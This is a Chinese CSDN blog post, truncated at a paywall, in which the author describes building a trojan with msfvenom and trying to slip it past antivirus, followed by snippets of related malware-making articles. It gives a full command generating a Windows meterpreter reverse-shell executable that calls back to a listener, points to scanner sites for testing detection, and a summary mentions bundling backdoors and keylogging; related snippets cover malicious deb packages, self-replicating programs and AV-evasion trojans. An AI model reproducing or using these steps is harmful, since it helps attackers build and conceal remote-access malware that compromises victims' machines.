制作恶意软件并且绕过防御软件

最新推荐文章于 2023-10-09 15:36:52 发布
最新推荐文章于 2023-10-09 15:36:52 发布
阅读量516 收藏
点赞数
分类专栏: msf 笔记 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45906009/article/details/106952357
版权
本文介绍了如何制作一个恶意文件,并通过msfvenom生成加密shell,探讨了免杀技巧,包括编码器选择和去除坏字符。尽管尝试了多种方法,但免费的免杀手段效果有限,最终通过捆绑后门降低报毒率,并在Kali Linux中开启监听和键盘记录等恶意操作。
摘要由CSDN通过智能技术生成

哈哈哈哈哈哈 不行 我有点兴奋 今天成功的写了一个恶意文件 (木马病毒)
话不多说 直接开始写
首先贴几个用来测试木马是是否能过安全狗的网站
各大AV尝试库
https://www.virustotal.com
https://www.virscan.org
这个地下的杀毒
https://nodistribute.com/

下面正式开始
msfvenom 是msfpayload msfencode 结合体
生成加密shell

首先制作一个简单的

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp Lhost=192.168.10.13 Lrort=4444 -f exe -o /root/a.exe

在这里插入图片描述
我们用xshell 连接一下 kali 并将其下载到本地
这边方便一下 发在本地

在这里插入图片描述
我们把写好的文件试试能不能过毒
在这里插入图片描述
很显然不能过毒 ,因为我们没有做免杀 没有加密过毒
下面我们尝试免杀过毒

msfvenom -a x86 --platform windows -p windo
最低0.47元/天 解锁文章
witcat呆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C#制作流氓软件
05-29
不仅因为Windows系统的脆弱,而且因为病毒无休止的自我复制和满硬盘的藏匿,使得我们脆弱的神经不堪重负,面对千疮百孔,有着莫名其妙而又千奇百怪的名字文件夹和文件的系统,相信大多数人都会选择重装系统。病毒和流氓软件总是让人气愤!那么,计算机程序怎么实现自我复制呢?其实这非常的简单。此程序就是用C#简单的实现一个能够自我复制的小小的恶意程序。(仅供学习,切勿害人)
无聊做的一个小恶意程序(仅linux上)
lan_777的博客
04-17 514
无聊做了一个孤儿进程,会不断在本目录创建文件,父进程很快结束。 解决,找到进程,kill它就好了。进程名字是编译后的可执行文件名。#include<stdio.h> #include<unistd.h> int main() { FILE *fp; int pid; int i=1; char s[100]; pid=fork(); if(pid==
使用MSF-msfvenom制作恶意 deb 软件包来触发后门
枫梓林のBlog
04-21 555
使用MSF-msfvenom制作恶意 deb 软件包来触发后门 文章目录使用MSF-msfvenom制作恶意 deb 软件包来触发后门 实验环境 Kali Linux 2019.1a Kali Linux 2020.4 1.制作恶意软件制作恶意软件包使用 --download-only 方式下载软件包不进行安装 注:freeweep root@fengzilin53:~# apt --download-only install -y freesweep root@fengzilin53:~# m
制作windows客户端恶意软件进行渗透
m0_56988395的博客
02-20 1010
目录 工具 靶机 客户端渗透原理 制作Windows恶意软件获取shell 工具 Metasploit 靶机 windows 2008 r2 相信大多数网友都是下载的虚拟机,所以请设置成桥接模式,确保位于同一网段 注:以下内容仅供学习交流,请勿用于非法用途 客户端渗透原理 在我们无法突破对方的网络边界时,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档,pdf文件。想要达到效果同时也要利用好社会工程学,来诱惑受害
1. 制作Windows恶意软件
jazzz98的博客
10-09 554
当然也可以直接加到主程序上,但是加主程序上,有时报错。下载的文件在/var/cache/apt/archives下,移动到根目录,dpkg解压。靶机访问链接下载文件http://192.168.142.135/西瓜影音.exe,执行。启动exploit/multi/handler监听模块,设置好端口,run开始监听。创建 deb 软件包,安装后脚本文件,来加载后门。当靶机运行后门程序,反弹成功,恶意软件成功连接。打开靶机,下载后门文件,添加执行权限并执行。msf启动handler监听后门程序
帆软报表绕过各种限制getshell.pdf
最新发布
04-22
- 制作恶意插件,并上传至系统中。 - 移动缓存目录到Web根目录下,以便后续操作。 - **注意事项**:确保上传的恶意插件能够成功执行。 ##### 4. 处理404错误 - **问题**:访问恶意插件创建的Shell路径时出现404...
28.文件上传漏洞和Caidao入门及防御原理(一)1
08-04
2. 图片一句话木马制作:为了绕过服务器的文件类型检查,攻击者有时会将木马代码嵌入到图片文件中,通过修改文件头信息来伪装成合法图片。 3. Caidao案例与原理:Caidao(菜刀)是一款常用的Web管理工具,攻击者...
用python制作免杀软件教程及工具.zip
07-26
在IT安全领域,免杀软件是指能够绕过安全软件检测的恶意程序,通常用于渗透测试或防御演练。本文将基于提供的资源,详细讲解如何利用Python来制作免杀软件,以及涉及的相关知识点。 首先,"py2exe-0.6.9.win32-py...
易语言写免杀软件
05-10
免杀技术在网络安全领域具有一定的争议性,因为它常被用于绕过安全防护,执行恶意行为,如盗号。然而,了解免杀原理也有助于提升安全防御能力。 免杀技术主要包括以下几个方面: 1. **代码混淆**:通过对程序代码...
免杀宽带密码查看器(过国内杀毒软件
10-26
然而,需要注意的是,任何绕过杀毒软件的工具都存在潜在风险,因为这同样可能被黑客利用来传播恶意软件。 【标签】"免杀宽带密码查看器"明确了该工具的主要功能和特性,即查看宽带密码且具备免杀功能,针对的是国内...
ChatGPT 成黑客编写恶意软件「利」器!
程序人生的博客
01-16 634
整理 | 何苗 出品 | CSDN(ID:CSDNnews)自 ChatGPT 推出以来,引发了科技圈的广泛关注,但也有许多研究人员担心生成式 AI 在将 AI 平民化的同时也会将使网络犯罪大众化。这种担心不无道理,在某些黑客论坛,安全研究人员观察到有人使用 ChatGPT 写恶意代码的现象。近期,一个名为《ChatGPT – Benefits of Malware》的帖子出现在某个热门...
恶意代码文档如何写
VN520的博客
04-25 180
恶意代码恶意软件主要是指以危害信息的安全等不良意图为目的的程序,它们一般潜伏在受害计算机系统中实施破坏或窃取信息。
如何做一个流氓软件-Android系统按钮的控制
Rindia的博客
09-21 1122
最近做一个项目要需要软件,不能随便被用户关掉,所以就一直研究如实现这种效果。主要实现的功能是,关掉虚拟按钮,关掉返回键,Home,menu键,电源键,下拉顶部栏。主要就是这几个。 返回键:返回键和音量键最简单,只要在Activity中重写onkeydown方法就好了。 @Override public boolean onKeyDown(int keyCode, KeyEv
C/C++屏保工具
CodeShark的博客
07-20 352
乌拉! 让我们先来看看效果 零基础打造流氓病毒_哔哩哔哩_bilibili 知识点:API 介绍及使用 图形库使用 exe调exe 媒体控制接口 流程: 搭台唱戏:显示黑客图片 生成屏幕数字雨 播放黑客帝国音乐 固定鼠标 可选(锁定鼠标和键盘) 一、搭台唱戏 要唱戏是不是得...
打造“免杀”的恶意程序需要多久?用这个工具,只要几分钟
zimosangtian的专栏
12-11 676
转自FreeBuf http://www.freebuf.com/sectool/115915.html 意大利萨尼奥大学(the University of Sannio)的研究团队Iswatlab,证实了打造一个能够规避杀软的恶意程序有多么容易。“编写”一个新的恶意软件,规避杀软或其它防护软件的检测,这很难。但是,“制造”一个能够躲避反恶意软件解决方案的恶意软件,却很简单。“编写”和“制
C语言编写简易病毒
热门推荐
Ray的博客
09-01 7万+
本次实验设计的是一个基于C语言的恶意代码,其执行流程如下: 1、 在病毒第一次执行时,即检测到注册表的任务管理器没有被禁用,则病毒依次执行以下功能: 创建开机启动项,在系统目录路径下面复制文件,将其作为自启动路径; 禁用任务管理器; 禁用注册表编辑器; 联网获取图片并修改桌面背景(重启生效); 修改注册表屏蔽用户键盘输入为1(重启生效); 删除驱动器盘符,使桌面以及开始菜单快捷方式失
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
weixin_44647915的博客
04-18 1万+
目的:制作一个能够绕过火绒检测的简单木马,熟悉一下怎么使用msfvenom制作木马,因此此处使用的火绒版本较低。 工具准备:火绒安全-3.0.42.0 下载文章:火绒历史全版本 百度网盘链接:https://pan.baidu.com/s/1ZrpYG63aDtQDVBnDFZoeXw 提取码:kr72 实验环境:kali-2019.4 (攻击方,IP:192.168.152.134)、win10(靶机) 【知识补充】 关于Msfvenom: (msfvenom ----a Metasploi
网络安全:制作 windows 和 linux 客户端恶意软件进行渗透
weixin_46035615的博客
04-21 5385
制作 windows 和 linux 客户端恶意软件进行渗透(拿到权限后开启屏幕共享 开启摄像头等等)
MSF实战制作Linux恶意软件
永远是少年
06-13 992
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF实战制作deb软件包后门。 一、恶意软件生成 二、监听设置 三、效果检验
恶意软件规避技术:设计、防御与检测策略
这篇研究对于理解恶意软件作者如何绕过现有的安全防护,以及如何设计更有效的防御措施具有重要的参考价值。它提醒我们,网络安全领域的战斗是一场持久战,需要不断更新知识和技术来应对不断演化的威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值